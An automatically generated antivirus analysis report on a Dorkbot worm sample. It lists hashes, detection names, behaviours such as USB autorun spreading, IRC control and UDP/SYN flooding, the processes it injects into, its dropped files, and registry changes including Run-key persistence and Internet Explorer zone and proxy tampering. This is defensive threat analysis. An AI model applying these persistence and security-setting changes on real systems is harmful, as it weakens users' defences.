Worm.Win32.Dorkbot_0507408aeb – Adaware

Trojan.Win32.Yakes.fdil (Kaspersky), Gen:Variant.Graftor.144415 (B) (Emsisoft), Gen:Variant.Graftor.144415 (AdAware), Backdoor.Win32.Farfli.FD, Worm.Win32.Dorkbot.FD, mzpefinder_pcap_file.YR, Sinowal.YR, WormDorkbot.YR, GenericUDPFlooder.YR, GenericIRCBot.YR, GenericMSNWorm.YR, GenericUSBInfector.YR, GenericDNSBlocker.YR, GenericDownloader.YR, GenericAutorunWorm.YR, GenericSYNFlooder.YR, GenericInjector.YR, BankerGeneric.YR, GenericProxy.YR, GenericPhysicalDrive0.YR (Lavasoft MAS)Behaviour: Banker, Trojan, Backdoor, Flooder, Worm, WormAutorun, IRCBot, MSNWorm, DNSBlocker, UDPFlooder, SYNFlooder, Trojan-Proxy, USBInfector

The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Summary

MD5: 0507408aeba6e089914234e07c5c820d

SHA1: 0176fd0f20f9884bec821083d91698255bae88f4

SHA256: 8ebd76d9305d5c702564a8791b2bdca49706e422d9ee37ae90b105abafee07aa

SSDeep: 1536:QPO20w4Ho0wPZYXpUsg/59Tf2OtavEtAtFFFFFFF5xWWAQ 53E/igGG:wBaUsC59Tf2uavEtAtFFFFFFF5sWDUUr

Size: 97792 bytes

File type: EXE

Platform: WIN32

Entropy: Not Packed

PEID: UPolyXv05_v6

Company: no certificate found

Created at: 2014-06-14 21:16:31

Analyzed on: WindowsXP SP3 32-bit

Summary: Worm. A program that is primarily replicating on networks or removable drives.

Dynamic Analysis

Payload

Behaviour	Description
WormAutorun	A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Worm's file once a user opens a drive's folder in Windows Explorer.
IRCBot	A bot can communicate with command and control servers via IRC channel.
MSNWorm	A worm can spread its copies through the MSN Messanger.
DNSBlocker	A program can block designated DNS servers for making it difficult for users to locate specific domains or web sites on the Internet.
UDPFlooder	This program can make a UDP flood. A UDP flood attack is a denial-of-service attack using the User Datagram Protocol (UDP). It can be initiated by sending a large number of UDP packets to random ports on a remote host.
SYNFlooder	This program can make a SYN flood. It is a form of denial-of-service attack in which an attacker sends a succession of SYN requests to a target's system in an attempt to consume enough server resources to make the system unresponsive to legitimate traffic.
Trojan-Proxy	This program can launch a proxy server (SOCKS4) on a designated TCP port.
USBInfector	A program can register a device notification with the help of RegisterDeviceNotification. So it is notified when a USB device is plugged and then the worm copies itself to the USB device plugged into the affected computer.

Process activity

The Worm creates the following process(es):

ngggg.exe:1096
ngggg.exe:1596
ngggg.exe:912
calc.exe:3372
zthzjntzphj.exe:3036
%original file name%.exe:1984
dqqq.exe:180
vuxrwahifpa.exe:3788
vuxrwahifpa.exe:3272
vuxrwahifpa.exe:2984
bpihytyvgix.exe:2996
sppp.exe:3284
sppp.exe:2528
bett.exe:1580
bett.exe:1672

The Worm injects its code into the following process(es):

imapi.exe:1264
vmacthlp.exe:920
calc.exe:1160
notepad.exe:1520
svchost.exe:884
jqs.exe:348
winlogon.exe:708
services.exe:752
svchost.exe:948
svchost.exe:1016
svchost.exe:1100
svchost.exe:1148
svchost.exe:1192
spoolsv.exe:1440
Explorer.EXE:1912

Mutexes

The following mutexes were created/opened:No objects were found.

File activity

The process ngggg.exe:1096 makes changes in the file system.

The Worm creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\c731200 (1281 bytes)

The Worm deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\ngggg.exe.gonewiththewings (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\dqqq.exe.gonewiththewings (0 bytes)

The process calc.exe:1160 makes changes in the file system.

The Worm creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\c731200 (9 bytes)

The process %original file name%.exe:1984 makes changes in the file system.

The Worm creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\ngggg.exe (9505 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\bett.exe (62128 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\dq[1].exe (21775 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\dqqq.exe (12735 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\spm[1].exe (43891 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\ng[1].exe (33073 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\bet[1].exe (70237 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\sppp.exe (33910 bytes)

The Worm deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\ngggg.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\sppp.exe (0 bytes)

The process vuxrwahifpa.exe:3272 makes changes in the file system.

The Worm creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\c731200 (1281 bytes)

The Worm deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\ngggg.exe.gonewiththewings (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\bpihytyvgix.exe.gonewiththewings (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\vuxrwahifpa.exe.gonewiththewings (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\zthzjntzphj.exe.gonewiththewings (0 bytes)
%Documents and Settings%\%current user%\Application Data\c731200 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\sppp.exe.gonewiththewings (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\dqqq.exe.gonewiththewings (0 bytes)

The process bett.exe:1672 makes changes in the file system.

The Worm creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\My Documents\My Videos\Desktop.ini (312 bytes)

The Worm deletes the following file(s):

%Program Files%\Common Files\CreativeAudio\desktop.ini (0 bytes)

Registry activity

The process ngggg.exe:1096 makes changes in the system registry.

The Worm creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3F 2E B1 8F F1 7C 37 B6 2E B7 50 D2 C0 62 93 54"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

The process ngggg.exe:1596 makes changes in the system registry.

The Worm creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "92 A3 EE 4D 66 CC 58 BD C5 50 33 27 FA EE 17 32"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The process ngggg.exe:912 makes changes in the system registry.

The Worm creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "09 C7 48 65 58 B0 C5 57 59 1A 61 04 FC 52 10 84"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

The process calc.exe:1160 makes changes in the system registry.

The Worm creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "30 4F B3 5E CC 5D CC 76 9D 9B D0 4A D1 09 C3 BA"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"My Video" = "%Documents and Settings%\%current user%\My Documents\My Videos"
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
"My Music" = "%Documents and Settings%\%current user%\My Documents\My Music"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Classes\CLSID\{6F9A5753-0A29-1B4E-BE6B-6AD96FE75E1E}\0E7302EC\CW1]
"1160" = "88 00 00 00 EC 09 00 00 8D F1 A2 00 4C 01 02 00"

The process calc.exe:3372 makes changes in the system registry.

The Worm creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "58 03 A1 40 04 7E 4A A4 0F CF 3C 26 4B 13 23 5C"

The process notepad.exe:1520 makes changes in the system registry.

The Worm creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Video" = "%Documents and Settings%\%current user%\My Documents\My Videos"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 20 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8F F1 6B CB 5F 10 56 81 D8 22 A9 A1 5B 49 BD 27"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Music" = "%Documents and Settings%\%current user%\My Documents\My Music"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Worm modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

To automatically run itself each time Windows is booted, the Worm adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Uukmkg" = "%Documents and Settings%\%current user%\Application Data\Identities\Uukmkg.exe"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Worm modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Worm modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Worm deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process zthzjntzphj.exe:3036 makes changes in the system registry.

The Worm creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "07 76 11 6E F8 B4 CC A0 AF 6F 34 4C D6 18 AE DA"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The process %original file name%.exe:1984 makes changes in the system registry.

The Worm creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Video" = "%Documents and Settings%\%current user%\My Documents\My Videos"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"My Music" = "%Documents and Settings%\%current user%\My Documents\My Music"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "15 54 EE E7 C3 47 FC 22 8A 66 11 F2 AA EF 0F CB"

[HKCU\Software\Classes\CLSID\{6F9A5753-0A29-1B4E-BE6B-6AD96FE75E1E}\0E7302EC\CW1]
"1984" = "88 00 00 00 B4 04 00 00 8D F1 EB 00 EE 00 0C 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Worm modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Worm modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Worm modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Worm deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process dqqq.exe:180 makes changes in the system registry.

The Worm creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EB 58 FD 8B E6 27 93 15 0E AF 5A 1D 04 A1 DE A8"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Video" = "%Documents and Settings%\%current user%\My Documents\My Videos"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Classes\CLSID\{6F9A5753-0A29-1B4E-BE6B-6AD96FE75E1E}\0E7302EC\CW1]
"180" = "88 00 00 00 34 0A 00 00 8D F1 98 00 50 01 02 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"My Music" = "%Documents and Settings%\%current user%\My Documents\My Music"
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The process vuxrwahifpa.exe:3788 makes changes in the system registry.

The Worm creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "19 AF F4 AB 4E 64 74 6F A3 F4 24 E3 0A 80 F5 77"

The process vuxrwahifpa.exe:3272 makes changes in the system registry.

The Worm creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9A EE 25 47 2B 02 77 C5 94 CB 87 F3 7D D4 95 C7"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

The process vuxrwahifpa.exe:2984 makes changes in the system registry.

The Worm creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EE 3D 07 01 6E C4 B9 47 8A 60 27 41 B5 E9 78 71"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The process bpihytyvgix.exe:2996 makes changes in the system registry.

The Worm creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "05 07 71 EC BA 4C 91 51 E6 8F 20 64 C8 FE 80 35"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The process sppp.exe:3284 makes changes in the system registry.

The Worm creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A5 5A 26 2D 8E DE 48 E1 F7 73 DC 8A 73 16 9B 7C"

[HKCU\Software\VRTWatchdog]
"PerfData" = "31 30 30 36 36 34 39 36 33 33 33 35 31 32 35 35"

To automatically run itself each time Windows is booted, the Worm adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"MicrosoftPerfWD" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\sppp.exe"

The process sppp.exe:2528 makes changes in the system registry.

The Worm creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FA A6 E1 34 34 27 6E C1 04 CD 4A FF 2C 49 B6 BE"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The process bett.exe:1580 makes changes in the system registry.

The Worm creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "91 0E 8D 6F 3B 0D 31 A2 E9 96 4D 2E 74 8D 5D 2B"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The process bett.exe:1672 makes changes in the system registry.

The Worm creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DB 7F A2 26 03 06 B3 9E FA 33 39 8E 48 99 35 E2"

